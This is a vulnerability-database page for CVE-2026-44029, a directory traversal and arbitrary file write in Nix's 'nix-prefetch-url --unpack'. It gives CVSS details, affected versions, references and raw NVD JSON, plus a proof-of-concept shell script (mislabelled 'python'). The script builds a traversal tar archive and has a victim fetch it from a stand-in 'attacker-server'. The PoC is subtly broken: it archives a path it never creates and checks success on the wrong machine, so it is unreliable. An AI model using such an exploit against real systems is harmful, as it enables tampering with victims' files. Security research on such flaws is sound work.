CVE-2026-44029

Description

An issue was discovered in Nix before 2.34.7. Writing to arbitrary files can occur via "nix-prefetch-url --unpack" or "nix store prefetch-file --unpack" directory traversal. The fixed versions are 2.34.7, 2.33.6, 2.32.8, 2.31.5, 2.30.5, 2.29.4, and 2.28.7 (introduced in 2.24.7);

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Nix < 2.34.7

Nix < 2.33.6

Nix < 2.32.8

Nix < 2.31.5

Nix < 2.30.5

Nix < 2.29.4

Nix < 2.28.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-44029: Nix Directory Traversal / Arbitrary File Write

# 1. Create a directory structure for the malicious payload
mkdir -p poc_exploit

# 2. Create a file to be written to an arbitrary location (e.g., /tmp/pwned.txt)
echo "CVE-2026-44029 Exploited: Arbitrary write successful" > poc_exploit/data.txt

# 3. Create a tar archive containing the file with a path traversal sequence
# Note: Modern tar tools may warn or block this, but the vulnerable Nix version processes it.
# Using --absolute-names or constructing the symlink manually might be needed depending on the implementation.
cd poc_exploit
tar --absolute-names -cf ../malicious.tar ./../../../../tmp/pwned.txt
cd ..

# 4. Simulate hosting the file (in a real scenario, host this on a web server)
echo "Host malicious.tar on a server accessible by the target."

# 5. Trigger the vulnerable command on the target system
# The attacker tricks the victim/system into running:
# nix-prefetch-url --unpack http://attacker-server/malicious.tar

# Verification: Check if the file was written to /tmp/
if [ -f "/tmp/pwned.txt" ]; then
    echo "[+] Exploit successful: File written to /tmp/pwned.txt"
    cat /tmp/pwned.txt
else
    echo "[-] Exploit failed or not executed"
fi

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44029
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44029
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44029/
[4] VulDB https://vuldb.com/cve/CVE-2026-44029
[5] https://discourse.nixos.org/t/security-advisory-local-privilege-escalation-in-lix-and-nix/77407
[6] https://github.com/NixOS/nix/security/advisories/GHSA-gr92-w2r5-qw5p
[7] https://www.openwall.com/lists/oss-security/2026/05/04/33

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44029", "sourceIdentifier": "[email protected]", "published": "2026-05-05T01:16:07.170", "lastModified": "2026-05-05T19:47:31.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Nix before 2.34.7. Writing to arbitrary files can occur via \"nix-prefetch-url --unpack\" or \"nix store prefetch-file --unpack\" directory traversal. The fixed versions are 2.34.7, 2.33.6, 2.32.8, 2.31.5, 2.30.5, 2.29.4, and 2.28.7 (introduced in 2.24.7);"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-36"}]}], "references": [{"url": "https://discourse.nixos.org/t/security-advisory-local-privilege-escalation-in-lix-and-nix/77407", "source": "[email protected]"}, {"url": "https://github.com/NixOS/nix/security/advisories/GHSA-gr92-w2r5-qw5p", "source": "[email protected]"}, {"url": "https://www.openwall.com/lists/oss-security/2026/05/04/33", "source": "[email protected]"}]}}